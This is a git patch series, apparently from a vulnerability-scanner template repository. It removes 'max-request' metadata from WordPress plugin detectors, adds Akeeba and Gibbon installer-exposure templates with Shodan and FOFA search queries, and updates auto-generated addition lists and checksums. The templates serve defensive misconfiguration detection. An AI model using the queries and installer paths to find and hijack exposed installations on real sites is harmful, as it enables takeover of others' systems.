diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From b15e6a8998968b983180739838285f9dc74dcb33 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Wed, 20 Sep 2023 12:01:48 +0530
Subject: [PATCH 0460/1090] Create akeeba-installer.yaml

---
 .../installer/akeeba-installer.yaml           | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 http/misconfiguration/installer/akeeba-installer.yaml

diff --git a/http/misconfiguration/installer/akeeba-installer.yaml b/http/misconfiguration/installer/akeeba-installer.yaml
new file mode 100644
index 0000000000..be185b757c
--- /dev/null
+++ b/http/misconfiguration/installer/akeeba-installer.yaml
@@ -0,0 +1,27 @@
+id: akeeba-installer
+
+info:
+  name: Akeeba Backup Installer - Exposure
+  author: DhiyaneshDK
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: html:"Akeeba Backup"
+  tags: misconfig,akeeba,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/installation/index.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Akeeba Backup Installer'
+
+      - type: status
+        status:
+          - 200

From d59736247df152860b74d2dd04fef0e15fd68dc4 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Wed, 20 Sep 2023 12:16:02 +0530
Subject: [PATCH 0461/1090] Create gibbon-installer.yaml

---
 .../installer/gibbon-installer.yaml           | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 http/misconfiguration/installer/gibbon-installer.yaml

diff --git a/http/misconfiguration/installer/gibbon-installer.yaml b/http/misconfiguration/installer/gibbon-installer.yaml
new file mode 100644
index 0000000000..d3d54f8cb2
--- /dev/null
+++ b/http/misconfiguration/installer/gibbon-installer.yaml
@@ -0,0 +1,32 @@
+id: gibbon-installer
+
+info:
+  name: Gibbon Installer - Exposure
+  author: DhiyaneshDK
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: icon_hash="-165631681"
+  tags: misconfig,gibbon,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/installer/install.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Gibbon Installer'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

From 43c3ca9f0f250a33e453f2cb43ddfefb5952d5e0 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 20 Sep 2023 06:52:41 +0000
Subject: [PATCH 0462/1090] Auto Generated New Template Addition List [Wed Sep
 20 06:52:41 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 2e9df042e9..7de1f8a54c 100644
--- a/.new-additions
+++ b/.new-additions
@@ -2,4 +2,5 @@ http/cves/2023/CVE-2023-2766.yaml
 http/cves/2023/CVE-2023-4568.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml
 http/misconfiguration/installer/alma-installer.yaml
+http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml

From 69c26d8341a5a6aaf6abf3197032a56ad0b72c78 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 20 Sep 2023 06:53:15 +0000
Subject: [PATCH 0463/1090] Auto Generated Templates Checksum [Wed Sep 20
 06:53:15 UTC 2023] :robot:

---
 templates-checksum.txt | 423 +++++++++++++++++++++--------------------
 1 file changed, 212 insertions(+), 211 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index e402ecca5d..b5a504c943 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -406,7 +406,7 @@ helpers/wordpress/plugins/disable-comments.txt:885717c949656aacb397735714a117bba
 helpers/wordpress/plugins/disable-gutenberg.txt:bdc1408a91f161dab5a9893d23db3c7095200e1d
 helpers/wordpress/plugins/duplicate-page.txt:eb8938636fe209df72afeee0da7ccac88ff1f5b9
 helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e
-helpers/wordpress/plugins/duplicator.txt:098abf50b35f199f6665ef82fc20ed1ed860018a
+helpers/wordpress/plugins/duplicator.txt:3dc7615cff1b7eae4c7ab89f98d62c1ff780f179
 helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:c70da539b9e83a50bb70013e6a5cb6e9d4623d5c
 helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d0362ed6
 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae
@@ -444,15 +444,15 @@ helpers/wordpress/plugins/header-footer.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e20
 helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc
 helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716
 helpers/wordpress/plugins/host-webfonts-local.txt:2d8d7a2994b4a941f25864496a40e7be21769689
-helpers/wordpress/plugins/imagify.txt:d24fa45ca77f079cc359c97272276969e6aead2c
+helpers/wordpress/plugins/imagify.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
 helpers/wordpress/plugins/imsanity.txt:8833d6b9ff65739ec437d2754b9fc885e202a555
-helpers/wordpress/plugins/insert-headers-and-footers.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
+helpers/wordpress/plugins/insert-headers-and-footers.txt:0b12745e63f19bb65c9778d99891dd5add137111
 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6
 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3
 helpers/wordpress/plugins/jetpack-boost.txt:d24fa45ca77f079cc359c97272276969e6aead2c
 helpers/wordpress/plugins/jetpack.txt:90db4c034fdf9f384fce435b9f9b57de9906c45c
-helpers/wordpress/plugins/kadence-blocks.txt:4ddf3a1e0a6b9d9c05f57b23f658e1113368aa4f
+helpers/wordpress/plugins/kadence-blocks.txt:774da1d333dbc314e254c08d65332aa68eb3b44b
 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa
 helpers/wordpress/plugins/leadin.txt:78702f4ab9863ce2deba27117b027181e59b6e3d
 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4b37c29fba8babd654bfb5f26219010dd1bf03f8
@@ -463,7 +463,7 @@ helpers/wordpress/plugins/loginizer.txt:9829113ed356f261f9202f78259f32919e9e5d9b
 helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92
 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/mailchimp-for-wp.txt:d962fd9a839a218de0c95dddb4f7e937cdd40d38
-helpers/wordpress/plugins/mailpoet.txt:92d82db05edd26b434ac5026c2bc3a9270d079d3
+helpers/wordpress/plugins/mailpoet.txt:20906ef00df144bed37785473c574f02a544e0bd
 helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b924
 helpers/wordpress/plugins/mainwp-child.txt:4fd5e5d395c7cb4645820b58e23fdf6fe34349ab
 helpers/wordpress/plugins/malcare-security.txt:24e26a42407173a638a100c03fae8fc56d72c5e3
@@ -474,7 +474,7 @@ helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0
 helpers/wordpress/plugins/newsletter.txt:96a20c8da2810939fa60d2647f8273c2251ad539
 helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655
 helpers/wordpress/plugins/nextgen-gallery.txt:7ca6257a3f05a3a6b604fd5dae8af8c1b41b8e0f
-helpers/wordpress/plugins/ninja-forms.txt:94f9b21809da9e412d33671b039ff794206b6902
+helpers/wordpress/plugins/ninja-forms.txt:8cef662de77623514d4c94b20aeef22a56a8f137
 helpers/wordpress/plugins/ocean-extra.txt:595d550379b2cb8bccb9659627308ff4e751d23f
 helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd104815e938d80643
 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8
@@ -520,7 +520,7 @@ helpers/wordpress/plugins/taxonomy-terms-order.txt:d2a825593d236a4bdf4eeecfe093c
 helpers/wordpress/plugins/the-events-calendar.txt:da12d3bdce91425575a83cf92ced2c2e796b4046
 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940
-helpers/wordpress/plugins/translatepress-multilingual.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e
+helpers/wordpress/plugins/translatepress-multilingual.txt:8e805063c85859847271163a1c51e5865e460aea
 helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:14507aa9246588cbf1725303a1878c660615d91a
 helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f
 helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d
@@ -545,7 +545,7 @@ helpers/wordpress/plugins/woocommerce.txt:dfaff11acbd25d0758b7c5294b4ff9d37debac
 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da
 helpers/wordpress/plugins/wordfence.txt:40784b4a67e4ba8b48f28ea24427fa8550433cc1
 helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8
-helpers/wordpress/plugins/wordpress-seo.txt:813eb0113a2a5b9f5219e1d0563a0b2af5fed4d6
+helpers/wordpress/plugins/wordpress-seo.txt:2406229d6e5b4bddde4f12bbe48d4cb7b2c8052d
 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/wp-fastest-cache.txt:ff3f1d7d10cbdc5507eb5d03d8f7d10b89642646
 helpers/wordpress/plugins/wp-file-manager.txt:9d90f00e19f5543904caf9ab2abd5b800e0613c0
@@ -559,12 +559,12 @@ helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b
 helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a
 helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:d343c69967f4ab0a58418b4f52fe9d4c4e39841f
 helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad
-helpers/wordpress/plugins/wp-seopress.txt:75c41cf137a9a31823a6e465d81658ce9077457c
+helpers/wordpress/plugins/wp-seopress.txt:0a7512d9a82ef5e8aacbfc48d29f1ac553e28c08
 helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5
 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c
 helpers/wordpress/plugins/wp-statistics.txt:d5b438b33eefd2351317d48768c3cfdcc2e1fbc7
 helpers/wordpress/plugins/wp-super-cache.txt:e9e533b0da8e5546eff821a40fbf7ca20ab9cf7e
-helpers/wordpress/plugins/wp-user-avatar.txt:88c9e71b6f0f80feda9e73aae625459cce73b1b8
+helpers/wordpress/plugins/wp-user-avatar.txt:40f7f795c98a6e3f421465c06243187d42d8e3c5
 helpers/wordpress/plugins/wpcf7-recaptcha.txt:255ee3124118ef39f0c2d984854cb0f180c4b1fe
 helpers/wordpress/plugins/wpcf7-redirect.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0
 helpers/wordpress/plugins/wpforms-lite.txt:2269ecf858a6c42d0d3451e7a6857f7331e60f35
@@ -4494,6 +4494,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:a5b7bca27435a71326f650190
 http/misconfiguration/installer/facturascripts-installer.yaml:02d94e59d0f49194d545a53396f455945760f85e
 http/misconfiguration/installer/geniusocean-installer.yaml:5c41a8624d2daf80af4cbdd2fe84f69c05b42c7c
 http/misconfiguration/installer/getsimple-installation.yaml:62fdd26ce8555b9fb8ef6435ed25c97e2f8e7199
+http/misconfiguration/installer/gibbon-installer.yaml:139035a3c73f56dbc51a9b58eb90504f7e26d952
 http/misconfiguration/installer/gitea-installer.yaml:30a0dc762499cbfb1c8ac2d1b3dfeb0148a619e5
 http/misconfiguration/installer/gogs-installer.yaml:e4b17e837c63e9fc4d08c858d653c60d6aabf2c3
 http/misconfiguration/installer/impresspages-installer.yaml:0d25cc61a9726b3527e2502bd4a40039ff5c1991
@@ -5850,218 +5851,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
+http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
+http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
+http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
+http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
